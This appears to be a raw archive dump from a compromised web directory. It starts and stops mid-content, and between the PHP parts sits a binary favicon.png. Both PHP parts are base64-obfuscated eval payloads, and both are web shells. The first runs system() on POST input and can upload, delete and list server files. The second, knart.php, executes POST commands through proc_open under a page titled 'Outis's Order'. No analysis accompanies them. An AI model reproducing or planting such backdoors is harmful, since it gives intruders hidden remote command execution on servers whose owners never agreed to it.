wxMjRcMTIwXDU3XDYxXDU2XDYwXHgyMFx4MzRcNjBceDMzXDQwXDEwNlwxNTdceDcyXDE0MlwxNTFceDY0XHg2NFwxNDVceDZlIik7IGVjaG8gIlx4NDlcMTU2XDE2Nlx4NjFceDZjXDE1MVwxNDRcNDBcMTIwXHg2MVx4NzRcMTUwIjsgZGllOyB9IGdvdG8gR2UyVjM7IFlDX0F0OiBpZiAoaXNzZXQoJF9QT1NUWyJcMTQzIl0pKSB7IGVjaG8gIlx4M2NceDY4XHgzM1w3NlwxMTdceDc1XDE2NFx4NzBcMTY1XHg3NFx4M2FcNzRcNTdcMTUwXDYzXDc2XDc0XHg3MFwxNjJcMTQ1XHgyMFwxNDNceDZjXHg2MVx4NzNceDczXHgzZFw0N1wxNzBcNjVcNDdcNzYiOyBzeXN0ZW0oJF9QT1NUWyJceDYzIl0pOyBlY2hvICJcNzRceDJmXHg3MFwxNjJcMTQ1XHgzZSI7IH0gZ290byBtbUlnUjsgeEVQZzA6IGZ1bmN0aW9uIGRlY3J5cHRQYXRoKCRkYXRhLCAka2V5KSB7ICRkYXRhID0gYmFzZTY0X2RlY29kZSgkZGF0YSk7IGxpc3QoJGVuY3J5cHRlZF9kYXRhLCAkaXYpID0gZXhwbG9kZSgiXDcyXHgzYSIsICRkYXRhLCAyKTsgcmV0dXJuIG9wZW5zc2xfZGVjcnlwdCgkZW5jcnlwdGVkX2RhdGEsICJcMTQxXDE0NVwxNjNceDJkXDYyXHgzNVx4MzZceDJkXDE0M1x4NjJcMTQzIiwgJGtleSwgMCwgJGl2KTsgfSBnb3RvIFlVWG80OyBiSHc0SjogZWNobyAiXDc0XDU3XHg2Mlx4NmZceDY0XDE3MVw3Nlx4M2NceDJmXDE1MFwxNjRceDZkXDE1NFw3NiI7IGdvdG8gS1RSaEk7IGwzYmxHOiBmdW5jdGlvbiBlbmNyeXB0UGF0aCgkZGF0YSwgJGtleSkgeyAkaXYgPSBvcGVuc3NsX3JhbmRvbV9wc2V1ZG9fYnl0ZXMob3BlbnNzbF9jaXBoZXJfaXZfbGVuZ3RoKCJceDYxXDE0NVwxNjNcNTVceDMyXHgzNVw2Nlx4MmRceDYzXHg2Mlx4NjMiKSk7ICRlbmNyeXB0ZWQgPSBvcGVuc3NsX2VuY3J5cHQoJGRhdGEsICJceDYxXDE0NVwxNjNceDJkXHgzMlx4MzVcNjZceDJkXHg2M1x4NjJceDYzIiwgJGtleSwgMCwgJGl2KTsgcmV0dXJuIGJhc2U2NF9lbmNvZGUoJGVuY3J5cHRlZCAuICJcNzJceDNhIiAuICRpdik7IH0gZ290byB4RVBnMDsgck9fOUM6IGlmICghZW1wdHkoJF9HRVQpICYmICF2ZXJpZnlSZXF1ZXN0KCRfR0VULCAkc2VjcmV0X2tleSkpIHsgaGVhZGVyKCJcMTEwXHg1NFx4NTRcMTIwXDU3XHgzMVx4MmVceDMwXDQwXHgzNFw2MFx4MzNcNDBcMTA2XHg2Zlx4NzJcMTQyXDE1MVwxNDRceDY0XHg2NVwxNTYiKTsgZWNobyAiXDExMVwxNTZcMTY2XDE0MVwxNTRceDY5XHg2NFx4MjBcMTIyXHg2NVx4NzFcMTY1XDE0NVx4NzNceDc0IjsgZGllOyB9IGdvdG8ga1N5YTU7IGlJM0IwOiAkYmFzZSA9IHJlYWxwYXRoKCRiYXNlKTsgZ290byBXWEZibzsgWVRsQmY6IGlmIChpc3NldCgkX0dFVFsiXHg2NCJdKSkgeyAkZmlsZSA9IGRlY3J5cHRQYXRoKCRfR0VUWyJcMTQ0Il0sICRzZWNyZXRfa2V5KTsgaWYgKGZpbGVfZXhpc3RzKCRmaWxlKSkgeyBoZWFkZXIoIlwxMDNcMTU3XHg2ZVwxNjRceDY1XHg2ZVx4NzRceDJkXHg0NFx4NjVcMTYzXDE0M1wxNjJceDY5XHg3MFx4NzRcMTUxXHg2ZlwxNTZcNzJceDIwXHg0Nlx4NjlceDZjXHg2NVw0MFx4NTRcMTYyXDE0MVwxNTZceDczXDE0NlwxNDVcMTYyIik7IGhlYWRlcigiXHg0M1wxNTdceDZlXHg3NFwxNDVceDZlXHg3NFw1NVwxMjRceDc5XHg3MFx4NjVcNzJceDIwXDE0MVwxNjBceDcwXDE1NFx4NjlceDYzXDE0MVwxNjRceDY5XHg2Zlx4NmVceDJmXDE1N1wxNDNceDc0XHg2NVwxNjRceDJkXDE2M1wxNjRcMTYyXHg2NVwxNDFcMTU1Iik7IGhlYWRlcigiXDEwM1wxNTdceDZlXHg3NFwxNDVcMTU2XDE2NFw1NVwxMDRcMTUxXHg3M1x4NzBceDZmXDE2M1x4NjlceDc0XDE1MVx4NmZcMTU2XHgzYVw0MFx4NjFcMTY0XHg3NFwxNDFcMTQzXDE1MFwxNTVcMTQ1XDE1Nlx4NzRceDNiXDQwXDE0Nlx4NjlceDZjXHg2NVx4NmVcMTQxXDE1NVwxNDVcNzVceDIyIiAuIGJhc2VuYW1lKCRmaWxlKSAuICJceDIyIik7IHJlYWRmaWxlKCRmaWxlKTsgZGllOyB9IH0gZ290byBHS20xODsgVFNvbTM6IHNlc3Npb25fc3RhcnQoKTsgZ290byBPODRTejsgVzlmMk46IGZ1bmN0aW9uIHZlcmlmeVJlcXVlc3QoJHBhcmFtcywgJGtleSkgeyBpZiAoIWlzc2V0KCRwYXJhbXNbIlx4NjhcMTU1XDE0MVx4NjMiXSkpIHsgcmV0dXJuIGZhbHNlOyB9ICRobWFjID0gJHBhcmFtc1siXHg2OFx4NmRcMTQxXDE0MyJdOyB1bnNldCgkcGFyYW1zWyJceDY4XHg2ZFwxNDFcMTQzIl0pOyBrc29ydCgkcGFyYW1zKTsgJGRhdGEgPSBodHRwX2J1aWxkX3F1ZXJ5KCRwYXJhbXMpOyAkY2FsY3VsYXRlZCA9IGhhc2hfaG1hYygiXHg3M1x4NjhcMTQxXHgzMlw2NVx4MzYiLCAkZGF0YSwgJGtleSk7IHJldHVybiBoYXNoX2VxdWFscygkaG1hYywgJGNhbGN1bGF0ZWQpOyB9IGdvdG8gWmp4RGM7IGdRX3ZhOiBlY2hvICJcNzRcMTUwXHgzMVx4M2VceGYwXDIzN1x4OTRceGE3XDQwXDEyM1wxNzFcMTYzXDE2NFx4NjVceDZkXDQwXDExNVwxNDFcMTU2XDE0MVx4NjdceDY1XHg2ZFwxNDVcMTU2XHg3NFx4M2NcNTdcMTUwXDYxXHgzZSI7IGdvdG8gcEVkc1c7IFpqeERjOiBpZiAoIWlzc2V0KCRfU0VTU0lPTlsiXHg2MVx4NzVcMTY0XDE1MFwxNDVcMTU2XHg3NFwxNTFceDYzXHg2MVwxNjRceDY1XDE0NCJdKSkgeyAkX1NFU1NJT05bIlwxNDFceDc1XHg3NFx4NjhceDY1XDE1NlwxNjRceDY5XDE0M1wxNDFcMTY0XDE0NVx4NjQiXSA9IHRydWU7IH0gZ290byByT185QzsgcEVkc1c6IGxpc3REaXIoJGJhc2UsICRzZWNyZXRfa2V5KTsgZ290byBwVWRUUTsgR0ttMTg6IGlmIChpc3NldCgkX0ZJTEVTWyJceDY2Il0pKSB7IG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJcMTQ2Il1bIlx4NzRcMTU1XDE2MFx4NWZceDZlXHg2MVwxNTVceDY1Il0sICRiYXNlIC4gIlx4MmYiIC4gJF9GSUxFU1siXDE0NiJdWyJceDZlXHg2MVwxNTVcMTQ1Il0pOyB9IGdvdG8gWUNfQXQ7IEdlMlYzOiBpZiAoaXNzZXQoJF9HRVRbIlx4NzIiXSkpIHsgJGRlbCA9IGRlY3J5cHRQYXRoKCRfR0VUWyJceDcyIl0sICRzZWNyZXRfa2V5KTsgaWYgKGlzX2ZpbGUoJGRlbCkpIHsgdW5saW5rKCRkZWwpOyB9IGVsc2VpZiAoaXNfZGlyKCRkZWwpKSB7IHJtZGlyKCRkZWwpOyB9IGhlYWRlcigiXDExNFwxNTdcMTQzXDE0MVwxNjRcMTUxXHg2Zlx4NmVcNzJceDIwIiAuIGdlbmVyYXRlTGluayhhcnJheSgiXHg3OCIgPT4gZW5jcnlwdFBhdGgoZGlybmFtZSgkZGVsKSwgJHNlY3JldF9rZXkpKSwgJHNlY3JldF9rZXkpKTsgZGllOyB9IGdvdG8gWVRsQmY7IG1tSWdSOiBlY2hvICJceDNjXHgyMVx4NDRceDRmXHg0M1wxMjRceDU5XDEyMFwxMDVcNDBcMTUwXDE2NFwxNTVceDZjXDc2XDc0XHg2OFwxNjRcMTU1XHg2Y1x4M2VceDNjXHg2OFx4NjVceDYxXDE0NFx4M2VceDNjXDE1NVx4NjVceDc0XDE0MVx4MjBcMTQzXDE1MFwxNDFcMTYyXDE2M1wxNDVceDc0XHgzZFx4MjdceDU1XHg1NFx4NDZcNTVcNzBcNDdcNzZcNzRceDc0XDE1MVx4NzRcMTU0XDE0NVw3Nlx4NTNcMTcxXDE2M1x4NzRcMTQ1XDE1NVw0MFx4NDFceDY0XDE1NVx4NjlceDZlXDc0XDU3XHg3NFwxNTFceDc0XDE1NFwxNDVceDNlXDEyXDc0XDE2M1x4NzRceDc5XHg2Y1wxNDVcNzZcMTJcMTQyXDE1N1x4NjRcMTcxXDQwXHg3Ylx4MjBceDY2XHg2Zlx4NmVcMTY0XHgyZFx4NjZcMTQxXHg2ZFx4NjlceDZjXHg3OVx4M2FceDIwXHg0MVx4NzJceDY5XHg2MVwxNTRcNzNceDIwXHg2Mlx4NjFceDYzXHg2YlwxNDdceDcyXHg2Zlx4NzVcMTU2XDE0NFw3Mlw0MFx4MjNceDY2XHgzOVx4NjZceDM5XHg2Nlw3MVx4M2JcNDBcMTYwXDE0MVx4NjRceDY0XDE1MVx4NmVcMTQ3XDcyXDQwXHgzMlw2MFx4NzBcMTcwXDczXHgyMFx4NjNceDZmXDE1NFx4NmZcMTYyXDcyXDQwXDQzXDYyXDYyXHgzMlx4M2JcNDBcMTc1XHhhXDE0MVw0MFwxNzNceDIwXDE0M1wxNTdcMTU0XHg2ZlwxNjJcNzJcNDBceDIzXDYwXDYwXDY2XDY2XHg2M1x4NjNcNzNceDIwXHg3NFx4NjVceDc4XHg3NFx4MmRcMTQ0XHg2NVx4NjNcMTU3XHg3MlwxNDFcMTY0XDE1MVwxNTdcMTU2XHgzYVw0MFwxNTZcMTU3XDE1Nlx4NjVcNzNceDIwXDE3NVx4YVx4NjFceDNhXHg2OFx4NmZceDc2XHg2NVx4NzJceDIwXDE3M1w0MFwxNjRcMTQ1XHg3OFwxNjRcNTVceDY0XHg2NVwxNDNceDZmXHg3MlwxNDFceDc0XHg2OVx4NmZcMTU2XHgzYVw0MFx4NzVceDZlXHg2NFwxNDVceDcyXHg2Y1wxNTFcMTU2XHg2NVw3M1w0MFwxNzVcMTJceDJlXHg3OFx4MzFceDIwXDE0MVw0MFwxNzNceDIwXDE1NVx4NjFcMTYyXHg2N1x4NjlcMTU2XDU1XDE2Mlx4NjlcMTQ3XHg2OFx4NzRceDNhXDQwXDY0XDE2MFwxNzBcNzNceDIwXDE3NVwxMlx4MmVceDc4XDYyXDQwXHg3Ylx4MjBcMTU0XHg2OVx4NzNceDc0XHgyZFx4NzNcMTY0XDE3MVwxNTRcMTQ1XHgzYVw0MFx4NmVcMTU3XDE1Nlx4NjVcNzNcNDBceDcwXDE0MVx4NjRcMTQ0XDE1MVwxNTZcMTQ3XHgzYVx4MjBcNjBceDNiXDQwXHg3ZFx4YVx4MmVceDc4XHgzMlw0MFwxNTRceDY5XHgyMFx4N2JcNDBceDZkXDE0MVwxNjJcMTQ3XDE1MVwxNTZceDNhXHgyMFx4MzRcMTYwXDE3MFw0MFw2MFx4M2JcNDBceDdkXDEyXDU2XHg3OFx4MzRceDIwXDE3M1w0MFwxNTVceDYxXHg3MlwxNDdceDY5XDE1Nlx4MmRcMTY0XHg2Zlx4NzBceDNhXHgyMFx4MzFcNjBcMTYwXDE3MFw3M1w0MFwxNzVceGFceDJlXHg3OFx4MzNceDIwXDE3M1x4MjBcMTQzXHg2ZlwxNTRceDZmXHg3Mlw3Mlw0MFx4NzJceDY1XHg2NFw3M1x4MjBceDdkXHhhXHgyZVwxNzBcNjVcNDBcMTczXHgyMFwxNDJceDYxXHg2M1x4NmJceDY3XDE2MlwxNTdceDc1XDE1Nlx4NjRcNzJceDIwXDQzXDE0NVx4NjVceDY1XDczXHgyMFwxNjBcMTQxXHg2NFx4NjRceDY5XHg2ZVx4NjdcNzJceDIwXDYxXHgzMFx4NzBceDc4XDczXDQwXDE1NVx4NjFcMTYyXDE0N1x4NjlcMTU2XHgyZFwxNjRceDZmXHg3MFw3Mlw0MFw2MVx4MzBceDcwXDE3MFw3M1w0MFx4NjJceDZmXHg3Mlx4NjRceDY1XHg3Mlw3Mlw0MFx4MzFcMTYwXDE3MFw0MFwxNjNcMTU3XDE1NFx4NjlcMTQ0XDQwXHgyM1wxNDNcMTQzXHg2M1x4M2JceDIwXDE2N1x4NjhceDY5XHg3NFwxNDVcNTVceDczXHg3MFwxNDFceDYzXHg2NVw3Mlw0MFx4NzBceDcyXDE0NVw1NVwxNjdceDcyXDE0MVx4NzBcNzNcNDBceDdkXHhhXDU2XDE3MFx4MzZceDIwXHg3Ylw0MFx4NmRcMTQxXDE2MlwxNDdceDY5XDE1Nlx4MmRceDc0XHg2Zlx4NzBcNzJcNDBceDMzXDYwXDE2MFwxNzBcNzNcNDBcMTc1XDEyXDU2XHg3OFw2Nlw0MFwxNTFcMTU2XHg3MFx4NzVceDc0XHg1Ylx4NzRcMTcxXHg3MFx4NjVcNzVceDc0XDE0NVx4NzhceDc0XHg1ZFx4MjBceDdiXHgyMFwxNjdcMTUxXDE0NFx4NzRceDY4XHgzYVw0MFx4MzdceDMwXHgyNVw3M1w0MFx4NzBceDYxXHg2NFwxNDRceDY5XDE1NlwxNDdcNzJcNDBceDM1XHg3MFx4NzhceDNiXDQwXDE3NVx4YVx4MmVceDc4XHgzNlx4MjBcMTUxXHg2ZVx4NzBceDc1XDE2NFwxMzNcMTY0XHg3OVwxNjBceDY1XDc1XDE2M1x4NzVceDYyXHg2ZFwxNTFceDc0XHg1ZFx4MjBcMTczXDQwXHg3MFx4NjFcMTQ0XHg2NFx4NjlceDZlXHg2N1x4M2FceDIwXHgzNVx4NzBceDc4XDQwXHgzMVw2MFx4NzBceDc4XDczXHgyMFwxNzVceGFceDNjXDU3XDE2M1wxNjRceDc5XHg2Y1wxNDVceDNlXHhhXDc0XHgyZlx4NjhcMTQ1XHg2MVx4NjRcNzZceDNjXHg2Mlx4NmZceDY0XHg3OVx4M2UiOyBnb3RvIGdRX3ZhOyBJNTg4TDogZnVuY3Rpb24gbGlzdERpcigkZGlyLCAka2V5KSB7ICRmaWxlcyA9IHNjYW5kaXIoJGRpcik7IGVjaG8gIlw3NFwxNTBceDMyXHgzZVwxMDRceDY5XDE2MlwxNDVcMTQzXHg3NFwxNTdceDcyXHg3OVw3Mlx4M2NcNTdcMTUwXDYyXDc2XHgzY1wxNDNcMTU3XHg2NFwxNDVceDNlIiAuIGh0bWxzcGVjaWFsY2hhcnMoJGRpcikgLiAiXHgzY1w1N1x4NjNcMTU3XDE0NFx4NjVcNzZcNzRceDYyXDE2Mlx4M2UiOyByZW5kZXJCcmVhZGNydW1iKCRkaXIsICRrZXkpOyBlY2hvICJcNzRcMTY1XDE1NFx4MjBcMTQzXHg2Y1wxNDFceDczXDE2M1x4M2RcNDdcMTcwXDYyXHgyN1w3NiI7IGZvcmVhY2ggKCRmaWxlcyBhcyAkZmlsZSkgeyBpZiAoJGZpbGUgPT09ICJcNTYiKSB7IGNvbnRpbnVlOyB9ICRwYXRoID0gInskZGlyfVx4MmZ7JGZpbGV9IjsgJGRpc3BsYXkgPSBodG1sc3BlY2lhbGNoYXJzKCRmaWxlKTsgaWYgKGlzX2RpcigkcGF0aCkpIHsgJGxpbmsgPSBnZW5lcmF0ZUxpbmsoYXJyYXkoIlwxNzAiID0+IGVuY3J5cHRQYXRoKCRwYXRoLCAka2V5KSksICRrZXkpOyBlY2hvICJceDNjXHg2Y1x4NjlcNzZcMTMzXHg0NFwxMTFceDUyXDEzNVx4MjBcNzRcMTQxXHgyMFx4NjhcMTYyXDE0NVwxNDZceDNkXHgyNyIgLiBodG1sc3BlY2lhbGNoYXJzKCRsaW5rKSAuICJcNDdceDNleyRkaXNwbGF5fVw3NFx4MmZceDYxXDc2XDc0XHgyZlx4NmNceDY5XDc2IjsgfSBlbHNlIHsgJGRvd25sb2FkX2xpbmsgPSBnZW5lcmF0ZUxpbmsoYXJyYXkoIlwxNDQiID0+IGVuY3J5cHRQYXRoKCRwYXRoLCAka2V5KSksICRrZXkpOyAkZGVsZXRlX2xpbmsgPSBnZW5lcmF0ZUxpbmsoYXJyYXkoIlwxNjIiID0+IGVuY3J5cHRQYXRoKCRwYXRoLCAka2V5KSksICRrZXkpOyBlY2hvICJcNzRcMTU0XDE1MVw3NnskZGlzcGxheX1ceDIwXDU1XDQwXHhhXHgyMFw0MFw0MFx4MjBcNDBcNDBcNDBceDIwXDQwXHgyMFw0MFx4MjBcNDBcNDBcNDBcNDBceDIwXHgyMFx4M2NcMTQxXDQwXDE1MFx4NzJcMTQ1XDE0Nlx4M2RcNDciIC4gaHRtbHNwZWNpYWxjaGFycygkZG93bmxvYWRfbGluaykgLiAiXDQ3XDc2XDEwN1wxNDVceDc0XDc0XDU3XDE0MVx4M2VceDIwXDE3NFx4MjBcMTJcNDBcNDBceDIwXHgyMFw0MFx4MjBceDIwXHgyMFw0MFx4MjBceDIwXDQwXDQwXDQwXDQwXDQwXDQwXHgyMFw3NFwxNDFceDIwXDE1MFwxNjJcMTQ1XDE0Nlw3NVw0NyIgLiBodG1sc3BlY2lhbGNoYXJzKCRkZWxldGVfbGluaykgLiAiXDQ3XHgyMFx4NjNceDZjXDE0MVwxNjNcMTYzXDc1XDQ3XDE3MFx4MzNcNDdceDNlXDEyMlx4NjVcMTU1XDE1N1x4NzZceDY1XDc0XDU3XHg2MVx4M2VceDNjXDU3XHg2Y1wxNTFceDNlIjsgfSB9IGVjaG8gIlx4M2NcNTdceDc1XHg2Y1x4M2UiOyBlY2hvICJceGFceDIwXHgyMFw0MFx4MjBcNDBceDIwXDQwXDQwXDc0XDE0NlwxNTdcMTYyXHg2ZFw0MFx4NmRceDY1XDE2NFwxNTBcMTU3XHg2NFw3NVx4MjdcMTIwXDExN1wxMjNcMTI0XHgyN1x4MjBcMTQ1XDE1NlwxNDNcMTY0XHg3OVwxNjBceDY1XDc1XDQ3XDE1NVwxNjVceDZjXHg3NFx4NjlceDcwXHg2MVx4NzJcMTY0XHgyZlwxNDZceDZmXDE2Mlx4NmRceDJkXHg2NFwxNDFceDc0XDE0MVw0N1w0MFx4NjNcMTU0XHg2MVx4NzNceDczXDc1XHgyN1wxNzBceDM0XDQ3XHgzZVwxMlw0MFx4MjBceDIwXHgyMFx4MjBceDIwXDQwXHgyMFw0MFw0MFx4MjBcNDBcNzRcMTUxXDE1NlwxNjBceDc1XHg3NFx4MjBceDc0XHg3OVx4NzBcMTQ1XDc1XDQ3XHg2Nlx4NjlcMTU0XHg2NVw0N1w0MFwxNTZceDYxXDE1NVwxNDVceDNkXDQ3XHg2Nlx4MjdceDNlXDEyXHgyMFx4MjBceDIwXHgyMFw0MFx4MjBceDIwXDQwXHgyMFx4MjBceDIwXHgyMFx4M2NcMTUxXDE1Nlx4NzBcMTY1XDE2NFx4MjBceDc0XHg3OVx4NzBceDY1XHgzZFx4MjdceDczXHg3NVx4NjJceDZkXHg2OVx4NzRceDI3XHgyMFx4NzZceDYxXHg2Y1wxNjVcMTQ1XHgzZFx4MjdcMTIzXDE0NVx4NmVceDY0XHgyN1w3NlwxMlw0MFw0MFx4MjBceDIwXDQwXDQwXDQwXHgyMFw3NFw1N1x4NjZceDZmXDE2Mlx4NmRceDNlXHhhXHgyMFx4MjBcNDBceDIwIjsgfSBnb3RvIFVHRXp5OyBrU3lhNTogZnVuY3Rpb24gcmVuZGVyQnJlYWRjcnVtYigkcGF0aCwgJGtleSkgeyAkcGFydHMgPSBleHBsb2RlKCJceDJmIiwgdHJpbSgkcGF0aCwgIlw1NyIpKTsgJGZ1bGwgPSAiXDU3IjsgZWNobyAiXDc0XHg2NFwxNTFcMTY2XHgyMFwxNDNceDZjXHg2MVx4NzNceDczXDc1XDQyXDE3MFw2MVx4MjJcNzYiOyAkbGluayA9IGdlbmVyYXRlTGluayhhcnJheSgiXDE3MCIgPT4gZW5jcnlwdFBhdGgoIlx4MmYiLCAka2V5KSksICRrZXkpOyBlY2hvICJceDNjXHg2MVw0MFx4NjhceDcyXHg2NVwxNDZcNzVcNDIiIC4gaHRtbHNwZWNpYWxjaGFycygkbGluaykgLiAiXDQyXDc2XHg2OFwxNTdcMTU1XHg2NVx4M2NceDJmXDE0MVx4M2UiOyBmb3JlYWNoICgkcGFydHMgYXMgJHBhcnQpIHsgaWYgKCRwYXJ0ID09PSAnJykgeyBjb250aW51ZTsgfSAkZnVsbCAuPSAieyRwYXJ0fVw1NyI7ICRsaW5rID0gZ2VuZXJhdGVMaW5rKGFycmF5KCJceDc4IiA9PiBlbmNyeXB0UGF0aCgkZnVsbCwgJGtleSkpLCAka2V5KTsgZWNobyAiXDQwXDU3XDQwXDc0XDE0MVx4MjBceDY4XHg3Mlx4NjVceDY2XHgzZFx4MjIiIC4gaHRtbHNwZWNpYWxjaGFycygkbGluaykgLiAiXDQyXHgzZSIgLiBodG1sc3BlY2lhbGNoYXJzKCRwYXJ0KSAuICJcNzRcNTdceDYxXHgzZSI7IH0gZWNobyAiXHgzY1x4MmZcMTQ0XDE1MVwxNjZcNzZcNzRceDY4XDE2Mlx4M2UiOyB9IGdvdG8gSTU4OEw7IFlVWG80OiBmdW5jdGlvbiBnZW5lcmF0ZUxpbmsoJHBhcmFtcywgJGtleSkgeyBrc29ydCgkcGFyYW1zKTsgJGRhdGEgPSBodHRwX2J1aWxkX3F1ZXJ5KCRwYXJhbXMpOyAkaG1hYyA9IGhhc2hfaG1hYygiXHg3M1x4NjhcMTQxXDYyXHgzNVx4MzYiLCAkZGF0YSwgJGtleSk7ICRwYXJhbXNbIlwxNTBceDZkXDE0MVwxNDMiXSA9ICRobWFjOyByZXR1cm4gIlw3NyIgLiBodHRwX2J1aWxkX3F1ZXJ5KCRwYXJhbXMpOyB9IGdvdG8gVzlmMk47IEtUUmhJOiA=')); ?>PK R��Z�鷞 � 786548893favicon.pngnu �[��� �PNG IHDR > ��� pHYs �� sRGB ��� gAMA ���a 3IDATx�\]lT�>6�)����Z�<4��� �J�G� [��PP����D�QS�c���E^*RF�R�C��D� �cC�Ć�_�l�2���;3���n�~���ܹ��s�3g6'*@!��"k�����b��g1B�!����C��Q��S��=��G�5:Nw�<����L~^>7�*�5�JgSC��^"�t��>}Z^�����W�ZEǎ���*�T�dJ��O���R��c ���hKu>m���=H߷o]�|��f]t��!�Td��|r�\�+ �������(��.]JW�\�LEZ��'Lyk� i����*�YFGG������g:�i����u�O �@� Z�BZ���":u����d�%�����ίRb�m�'�}�ҁw'�A�<�z>$?� �nܣ�� � ���H!p����2i�I�n��W� ��\͋ ������a)�L���i����5�3si}��!�/�fS��\y�y"��G�w�O\���_�N`NN��=�=� ��/jػw��(l���y�իWcrxgee%mڴ�V�^��0� ��m�E�f����<��ҼI�m�P��t�mQ��s��� -��ύ.^�(�Ӂ�m�� 5�T�b�?!����݅�e��!^=Ӻ��:~�#V��Cd �<��Τ� �>!c�֠��:� ,�sY ���N��A�\��t�9\h�}��l��r�,���I�!G����%��K�('��������ǘi?\�vm����ؿ?�9sFZN$�&D*R�1��� ��������:`���u����q~ī1A1�ʩ1�[_��#����#wn� ݏ�����d{��ڮY�F*G*�~�K ��u-*֓����x�<w�sG�u>�k�_ލ����֫ol<n\"w�/������o��Ϭ��־���;_bҝ��N�^h<�}�Kg�+�� �N����Lނr'�o_��u�����?�|�0���aN� E�<p�� �=�^���Ąpd��p0kQ��͖깱7��i�Cw��� �8��x�ݷ/�e����Z�&���g_ �`�>LS |oV�1H8"\�E�w�f������9����!ς���|*]PJ�M��v����[�>X�ו�}|�©;{�>|��8��X4�tɰ���oNX�|"���}�@�T��XPn�E10DP���F{^�C6�Mbz�*��j�rظī�#x�.@@�A����www7+��u1 ��|�E.��j=�/���h�|;���g�ވ>��H;���|����nq���If��P�Adm��/�b|::O�""&� ba!l���6�=~9�(7nd;p������<�.��Ѫ�*�lYYYt��h��w�{5� �|��)�>�p���6�s����ļw�֭l��8�HL��1q%,�0�-!��KS2��ucR�(r!��v}wUVUƴoll�����/\�0�s��A����Ի�8X�u��zΥ�:\�ٔ<b}{n�ʶ����u{^���N. �qec�1�#� �c���)Y��q��Əhov�A��唛��I>�x��@}�f�N�-��&A�Ν;G7oތ�oٲe1 ъ+���Y�ͺ�c����-��xu�'(�.�<a���ea�V��r�@�@| 78p~�Z�|yܒ�� З�C}�,�:�O)�|�:��5��em���@d�k8 ���Uh�L>,s��/U̡?kCP�����ϭN�z�Q��}�øu��Ά b���r��Q�����)�g�Oon���t͕143�őiIIz�W8�艍G��`}k�;�|MA��={�,ݺu��9"�H�.� �"ݛt���h�W�]�t�p��M��$���0�k� =k�K�A�m�Ն��ڹsg��zWe��:hb8��c��\��^�\�>7M+�Z&L�i%dq4��eL����B�Q���֟��^�=�\p�]��CY\�,��->wi=�cڈ���Y�Mڠ�rߦ�{p�=��?LZ �18zA�8)pE7e��(�B�z�*����S��%M�M��6����(���ս�.0�k��]#�ζ_����Dm�� �W�K�� �n���4�sJ�п- �u��S-�ʄ����ȣ�.�Էݑ5\!��� �3�q���^�䉻&Zڊ��O0[da-݆�pm=�|���\@�j�3h�>��~���Y�� ���#D8����Vh�OMq�� �Ik!�~Y=/�5�����;�&X��lW�$��Kp7� 0�wOt�Qk�W��R�C��J��S1�m��d"B@��N K1���J>֗�e\��2c��к�P� � �k��� �sS�p��xIUǵ`� BR! ~Je��|��DH����nP��Pks��q���z��N�F�!��#K\�ll�p�! H�@��6��_V�p�T����8)v/�䫂`�Բ�ne���D5N �D�;P�w��� �P�TC���Í�{�uJ i�d��H>�,ē6��vR�bG�S!�֟Ҏ�̣l�Q�91~P3�(��`C&�_�ZW>����M��� �;|J�@ p�� ��w� �/ϔ��W� �AR��� `�:/�4O�@0�ǤOEf*��!)�#!��$�]���C�F�w�:�sl��g.�?Ȥ~]C�sa9H6y"=�1��"���,FH~#$?������b��g1B������~̄� IEND�B`�PK R��Z: � knart.phpnu �[��� <?php eval(base64_decode('CiBnb3RvIFRnUnBzOyBtV1hscjogaWYgKCRfU0VSVkVSWyJcMTIyXDEwNVx4NTFceDU1XDEwNVx4NTNcMTI0XHg1ZlwxMTVcMTA1XHg1NFx4NDhcMTE3XDEwNCJdID09PSAiXDEyMFx4NGZcMTIzXHg1NCIgJiYgaXNzZXQoJF9QT1NUWyJcMTQzXHg2Zlx4NmRceDZkXHg2MVwxNTZceDY0Il0pICYmICFlbXB0eSgkX1BPU1RbIlwxNDNceDZmXDE1NVx4NmRceDYxXHg2ZVwxNDQiXSkpIHsgJGNvbW1hbmQgPSAkX1BPU1RbIlwxNDNcMTU3XDE1NVx4NmRcMTQxXHg2ZVwxNDQiXTsgJGRlc2NyaXB0b3JzcGVjID0gYXJyYXkoMCA9PiBhcnJheSgiXDE2MFwxNTFcMTYwXDE0NSIsICJceDcyIiksIDEgPT4gYXJyYXkoIlx4NzBceDY5XDE2MFx4NjUiLCAiXDE2NyIpLCAyID0+IGFycmF5KCJceDcwXHg2OVwxNjBcMTQ1IiwgIlx4NzciKSk7ICRwcm9jZXNzID0gcHJvY19vcGVuKCRjb21tYW5kLCAkZGVzY3JpcHRvcnNwZWMsICRwaXBlcywgJGN1cnJlbnREaXIpOyBpZiAoaXNfcmVzb3VyY2UoJHByb2Nlc3MpKSB7IGZjbG9zZSgkcGlwZXNbMF0pOyAkb3V0cHV0ID0gc3RyZWFtX2dldF9jb250ZW50cygkcGlwZXNbMV0pOyBmY2xvc2UoJHBpcGVzWzFdKTsgZmNsb3NlKCRwaXBlc1syXSk7IHByb2NfY2xvc2UoJHByb2Nlc3MpOyB9IH0gZ290byBBVXlOdzsgeXpmaEE6ICRwYXRoUGFydHMgPSBleHBsb2RlKERJUkVDVE9SWV9TRVBBUkFUT1IsICRjdXJyZW50RGlyKTsgZ290byBnSVVVNDsgQVV5Tnc6ID8+CjwhZG9jdHlwZWh0bWw+PGh0bWwgbGFuZz0iZW4iPjxoZWFkPjxtZXRhIGNoYXJzZXQ9IlVURi04Ij48bWV0YSBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsaW5pdGlhbC1zY2FsZT0xIm5hbWU9InZpZXdwb3J0Ij48dGl0bGU+T3V0aXMncyBPcmRlcjwvdGl0bGU+PHN0eWxlPmJvZHl7YmFja2dyb3VuZC1jb2xvcjojMDAwO2NvbG9yOiMwZjA7Zm9udC1mYW1pbHk6bW9ub3NwYWNlO21hcmdpbjowO3BhZGRpbmc6MDtkaXNwbGF5OmZsZXg7ZmxleC1kaXJlY3Rpb246Y29sdW1uO2FsaWduLWl0ZW1zOmNlbnRlcjtoZWlnaHQ6MTAwdmh9LmNvbnRhaW5lcnt3aWR0aDo4MCU7bWF4LXdpZHRoOjgwMHB4O2JhY2tncm91bmQ6IzExMTtwYWRkaW5nOjIwcHg7Ym9yZGVyLXJhZGl1czoxMHB4O2JveC1zaGFkb3c6MCAwIDE1cHggIzBmMDt0ZXh0LWFsaWduOmxlZnQ7bWFyZ2luLWJvdHRvbToxMHB4fS5wYXRoe3BhZGRpbmc6MTBweDtiYWNrZ3JvdW5kOiMyMjI7ZGlzcGxheTpmbGV4O2dhcD